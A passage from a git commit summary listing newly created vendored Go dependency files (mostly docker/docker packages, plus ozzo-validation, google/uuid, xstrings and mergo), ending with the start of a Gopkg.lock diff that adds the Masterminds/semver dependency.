vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/operatingsystem/operatingsystem_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers.go create mode 100644 vendor/github.com/docker/docker/pkg/parsers/parsers_test.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_test.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/pidfile/pidfile_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/architecture_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/platform.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_int8.go create mode 100644 vendor/github.com/docker/docker/pkg/platform/utsname_uint8.go create mode 100644 vendor/github.com/docker/docker/pkg/plugingetter/getter.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/client_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/errors.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugin_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/template.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/http.go create mode 100644 vendor/github.com/docker/docker/pkg/plugins/transport/transport.go create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools.go create mode 100644 vendor/github.com/docker/docker/pkg/pools/pools_test.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progress.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader.go create mode 100644 vendor/github.com/docker/docker/pkg/progress/progressreader_test.go create mode 100644 vendor/github.com/docker/docker/pkg/promise/promise.go create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher.go create mode 100644 vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go create mode 100644 vendor/github.com/docker/docker/pkg/random/random.go create mode 100644 vendor/github.com/docker/docker/pkg/random/random_test.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/README.md create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/command_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/reexec/reexec.go create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar.go create mode 100644 vendor/github.com/docker/docker/pkg/registrar/registrar_test.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/README.md create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/signal_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/signal/trap.go create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go create mode 100644 vendor/github.com/docker/docker/pkg/stdcopy/stdcopy_test.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter.go create mode 100644 vendor/github.com/docker/docker/pkg/streamformatter/streamformatter_test.go create mode 100644 vendor/github.com/docker/docker/pkg/stringid/README.md create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid.go create mode 100644 vendor/github.com/docker/docker/pkg/stringid/stringid_test.go create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/README.md create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils.go create mode 100644 vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE create mode 100644 vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD create mode 100644 vendor/github.com/docker/docker/pkg/symlink/README.md create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/symlink/fs_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/README.md create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/chtimes_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/errors.go create mode 100644 vendor/github.com/docker/docker/pkg/system/events_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/exitcode.go create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys.go create mode 100644 vendor/github.com/docker/docker/pkg/system/filesys_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/lstat_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/meminfo_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod.go create mode 100644 vendor/github.com/docker/docker/pkg/system/mknod_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/path_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/stat_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/umask.go create mode 100644 vendor/github.com/docker/docker/pkg/system/umask_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go create mode 100644 vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile.go create mode 100644 vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_spec.md create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/46af0962ab5afeb5ce6740d4d91652e69206fc991fd5328c1a94d364ad00e457/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-0.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-1.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-2.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/collision/collision-3.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/json create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/testdata/xattr/layer.tar create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go create mode 100644 vendor/github.com/docker/docker/pkg/tarsum/writercloser.go create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii.go create mode 100644 vendor/github.com/docker/docker/pkg/term/ascii_test.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_linux_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_other.go create mode 100644 vendor/github.com/docker/docker/pkg/term/tc_solaris_cgo.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_solaris.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_unix.go create mode 100644 vendor/github.com/docker/docker/pkg/term/term_windows.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_darwin.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_freebsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_linux.go create mode 100644 vendor/github.com/docker/docker/pkg/term/termios_openbsd.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/console.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows.go create mode 100644 vendor/github.com/docker/docker/pkg/term/windows/windows_test.go create mode 100644 vendor/github.com/docker/docker/pkg/testutil/assert/assert.go create mode 100644 vendor/github.com/docker/docker/pkg/testutil/pkg.go create mode 100644 vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go create mode 100644 vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex.go create mode 100644 vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil.go create mode 100644 vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go create mode 100644 vendor/github.com/docker/docker/pkg/useragent/README.md create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent.go create mode 100644 vendor/github.com/docker/docker/pkg/useragent/useragent_test.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/backend_unsupported.go create mode 100644 vendor/github.com/docker/docker/plugin/blobstore.go create mode 100644 vendor/github.com/docker/docker/plugin/defs.go create mode 100644 vendor/github.com/docker/docker/plugin/manager.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_solaris.go create mode 100644 vendor/github.com/docker/docker/plugin/manager_windows.go create mode 100644 vendor/github.com/docker/docker/plugin/store.go create mode 100644 vendor/github.com/docker/docker/plugin/store_test.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_linux.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/plugin_unsupported.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/settable.go create mode 100644 vendor/github.com/docker/docker/plugin/v2/settable_test.go create mode 100644 vendor/github.com/docker/docker/poule.yml create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/apparmor.go create mode 100644 vendor/github.com/docker/docker/profiles/apparmor/template.go create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/default.json create mode 100755 vendor/github.com/docker/docker/profiles/seccomp/fixtures/example.json create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/generate.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_default.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go create mode 100644 vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go create mode 100644 vendor/github.com/docker/docker/project/ARM.md create mode 100644 vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md create mode 120000 vendor/github.com/docker/docker/project/CONTRIBUTORS.md create mode 100644 vendor/github.com/docker/docker/project/GOVERNANCE.md create mode 100644 vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md create mode 100644 vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md create mode 100644 vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md create mode 100644 vendor/github.com/docker/docker/project/PACKAGERS.md create mode 100644 vendor/github.com/docker/docker/project/PATCH-RELEASES.md create mode 100644 vendor/github.com/docker/docker/project/PRINCIPLES.md create mode 100644 vendor/github.com/docker/docker/project/README.md create mode 100644 vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md create mode 100644 vendor/github.com/docker/docker/project/RELEASE-PROCESS.md create mode 100644 vendor/github.com/docker/docker/project/REVIEWING.md create mode 100644 vendor/github.com/docker/docker/project/TOOLS.md create mode 100644 vendor/github.com/docker/docker/reference/reference.go create mode 100644 vendor/github.com/docker/docker/reference/reference_test.go create mode 100644 vendor/github.com/docker/docker/reference/store.go create mode 100644 vendor/github.com/docker/docker/reference/store_test.go create mode 100644 vendor/github.com/docker/docker/registry/auth.go create mode 100644 vendor/github.com/docker/docker/registry/auth_test.go create mode 100644 vendor/github.com/docker/docker/registry/config.go create mode 100644 vendor/github.com/docker/docker/registry/config_test.go create mode 100644 vendor/github.com/docker/docker/registry/config_unix.go create mode 100644 vendor/github.com/docker/docker/registry/config_windows.go create mode 100644 vendor/github.com/docker/docker/registry/endpoint_test.go create mode 100644 vendor/github.com/docker/docker/registry/endpoint_v1.go create mode 100644 vendor/github.com/docker/docker/registry/registry.go create mode 100644 vendor/github.com/docker/docker/registry/registry_mock_test.go create mode 100644 vendor/github.com/docker/docker/registry/registry_test.go create mode 100644 vendor/github.com/docker/docker/registry/service.go create mode 100644 vendor/github.com/docker/docker/registry/service_v1.go create mode 100644 vendor/github.com/docker/docker/registry/service_v1_test.go create mode 100644 vendor/github.com/docker/docker/registry/service_v2.go create mode 100644 vendor/github.com/docker/docker/registry/session.go create mode 100644 vendor/github.com/docker/docker/registry/types.go create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager.go create mode 100644 vendor/github.com/docker/docker/restartmanager/restartmanager_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/compare.go create mode 100644 vendor/github.com/docker/docker/runconfig/compare_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/config.go create mode 100644 vendor/github.com/docker/docker/runconfig/config_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/config_unix.go create mode 100644 vendor/github.com/docker/docker/runconfig/config_windows.go create mode 100644 vendor/github.com/docker/docker/runconfig/errors.go create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_14.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_17.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_config_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_14.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/unix/container_hostconfig_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/fixtures/windows/container_config_1_19.json create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_unix.go create mode 100644 vendor/github.com/docker/docker/runconfig/hostconfig_windows.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/envfile_test.go create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16be.env create mode 100755 vendor/github.com/docker/docker/runconfig/opts/fixtures/utf8.env create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.env create mode 100644 vendor/github.com/docker/docker/runconfig/opts/fixtures/valid.label create mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/opts_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/parse_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/runtime.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/throttledevice.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go create mode 100644 vendor/github.com/docker/docker/runconfig/opts/weightdevice.go create mode 100644 vendor/github.com/docker/docker/utils/debug.go create mode 100644 vendor/github.com/docker/docker/utils/debug_test.go create mode 100644 vendor/github.com/docker/docker/utils/names.go create mode 100644 vendor/github.com/docker/docker/utils/process_unix.go create mode 100644 vendor/github.com/docker/docker/utils/process_windows.go create mode 100644 vendor/github.com/docker/docker/utils/templates/templates.go create mode 100644 vendor/github.com/docker/docker/utils/templates/templates_test.go create mode 100644 vendor/github.com/docker/docker/utils/utils.go create mode 100644 vendor/github.com/docker/docker/utils/utils_test.go create mode 100644 vendor/github.com/docker/docker/vendor.conf create mode 100644 vendor/github.com/docker/docker/volume/drivers/adapter.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/extpoint_test.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy.go create mode 100644 vendor/github.com/docker/docker/volume/drivers/proxy_test.go create mode 100644 vendor/github.com/docker/docker/volume/local/local.go create mode 100644 vendor/github.com/docker/docker/volume/local/local_test.go create mode 100644 vendor/github.com/docker/docker/volume/local/local_unix.go create mode 100644 vendor/github.com/docker/docker/volume/local/local_windows.go create mode 100644 vendor/github.com/docker/docker/volume/store/db.go create mode 100644 vendor/github.com/docker/docker/volume/store/errors.go create mode 100644 vendor/github.com/docker/docker/volume/store/restore.go create mode 100644 vendor/github.com/docker/docker/volume/store/store.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_test.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_unix.go create mode 100644 vendor/github.com/docker/docker/volume/store/store_windows.go create mode 100644 vendor/github.com/docker/docker/volume/testutils/testutils.go create mode 100644 vendor/github.com/docker/docker/volume/validate.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test_unix.go create mode 100644 vendor/github.com/docker/docker/volume/validate_test_windows.go create mode 100644 vendor/github.com/docker/docker/volume/volume.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_unix.go create mode 100644 vendor/github.com/docker/docker/volume/volume_copy_windows.go create mode 100644 vendor/github.com/docker/docker/volume/volume_linux.go create mode 100644 vendor/github.com/docker/docker/volume/volume_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go create mode 100644 vendor/github.com/docker/docker/volume/volume_test.go create mode 100644 vendor/github.com/docker/docker/volume/volume_unix.go create mode 100644 vendor/github.com/docker/docker/volume/volume_unsupported.go create mode 100644 vendor/github.com/docker/docker/volume/volume_windows.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.gitignore create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/.travis.yml create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/LICENSE create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/README.md create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/UPGRADE.md create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/date_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/error_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/example_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/in_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/is/rules_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/length_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/match_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/minmax_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/not_nil_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/required_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/string_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/struct.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/struct_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/util_test.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation.go create mode 100644 vendor/github.com/go-ozzo/ozzo-validation/validation_test.go create mode 100644 vendor/github.com/google/uuid/.travis.yml create mode 100644 vendor/github.com/google/uuid/CONTRIBUTING.md create mode 100644 vendor/github.com/google/uuid/CONTRIBUTORS create mode 100644 vendor/github.com/google/uuid/LICENSE create mode 100644 vendor/github.com/google/uuid/README.md create mode 100644 vendor/github.com/google/uuid/dce.go create mode 100644 vendor/github.com/google/uuid/doc.go create mode 100644 vendor/github.com/google/uuid/hash.go create mode 100644 vendor/github.com/google/uuid/json_test.go create mode 100644 vendor/github.com/google/uuid/marshal.go create mode 100644 vendor/github.com/google/uuid/node.go create mode 100644 vendor/github.com/google/uuid/seq_test.go create mode 100644 vendor/github.com/google/uuid/sql.go create mode 100644 vendor/github.com/google/uuid/sql_test.go create mode 100644 vendor/github.com/google/uuid/time.go create mode 100644 vendor/github.com/google/uuid/util.go create mode 100644 vendor/github.com/google/uuid/uuid.go create mode 100644 vendor/github.com/google/uuid/uuid_test.go create mode 100644 vendor/github.com/google/uuid/version1.go create mode 100644 vendor/github.com/google/uuid/version4.go create mode 100644 vendor/github.com/huandu/xstrings/.gitignore create mode 100644 vendor/github.com/huandu/xstrings/.travis.yml create mode 100644 vendor/github.com/huandu/xstrings/CONTRIBUTING.md create mode 100644 vendor/github.com/huandu/xstrings/LICENSE create mode 100644 vendor/github.com/huandu/xstrings/README.md create mode 100644 vendor/github.com/huandu/xstrings/common.go create mode 100644 vendor/github.com/huandu/xstrings/convert.go create mode 100644 vendor/github.com/huandu/xstrings/convert_test.go create mode 100644 vendor/github.com/huandu/xstrings/count.go create mode 100644 vendor/github.com/huandu/xstrings/count_test.go create mode 100644 vendor/github.com/huandu/xstrings/doc.go create mode 100644 vendor/github.com/huandu/xstrings/format.go create mode 100644 vendor/github.com/huandu/xstrings/format_test.go create mode 100644 vendor/github.com/huandu/xstrings/manipulate.go create mode 100644 vendor/github.com/huandu/xstrings/manipulate_test.go create mode 100644 vendor/github.com/huandu/xstrings/translate.go create mode 100644 vendor/github.com/huandu/xstrings/translate_test.go create mode 100644 vendor/github.com/huandu/xstrings/util_test.go create mode 100644 vendor/github.com/imdario/mergo/.gitignore create mode 100644 vendor/github.com/imdario/mergo/.travis.yml create mode 100644 vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md create mode 100644 vendor/github.com/imdario/mergo/LICENSE create mode 100644 vendor/github.com/imdario/mergo/README.md create mode 100644 vendor/github.com/imdario/mergo/doc.go create mode 100644 vendor/github.com/imdario/mergo/issue17_test.go create mode 100644 vendor/github.com/imdario/mergo/issue23_test.go create mode 100644 vendor/github.com/imdario/mergo/issue33_test.go create mode 100644 vendor/github.com/imdario/mergo/issue38_test.go create mode 100644 vendor/github.com/imdario/mergo/issue50_test.go create mode 100644 vendor/github.com/imdario/mergo/issue52_test.go create mode 100644 vendor/github.com/imdario/mergo/issue61_test.go create mode 100644 vendor/github.com/imdario/mergo/issue64_test.go create mode 100644 vendor/github.com/imdario/mergo/issue66_test.go create mode 100644 vendor/github.com/imdario/mergo/map.go create mode 100644 vendor/github.com/imdario/mergo/merge.go create mode 100644 vendor/github.com/imdario/mergo/merge_appendslice_test.go create mode 100644 vendor/github.com/imdario/mergo/merge_test.go create mode 100644 vendor/github.com/imdario/mergo/mergo.go create mode 100644 vendor/github.com/imdario/mergo/mergo_test.go create mode 100644 vendor/github.com/imdario/mergo/pr80_test.go create mode 100644 vendor/github.com/imdario/mergo/pr81_test.go create mode 100644 vendor/github.com/imdario/mergo/testdata/license.yml create mode 100644 vendor/github.com/imdario/mergo/testdata/thing.yml diff --git a/Gopkg.lock b/Gopkg.lock index 19c0ad71bb..dc144cf25f 100644 --- a/Gopkg.lock +++ b/Gopkg.lock @@ -1,6 +1,30 @@ # This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'. +[[projects]] + name = "github.com/Masterminds/semver" + packages = ["."] + revision = "c7af12943936e8c39859482e61f0574c2fd7fc75" + version = "v1.4.2" + 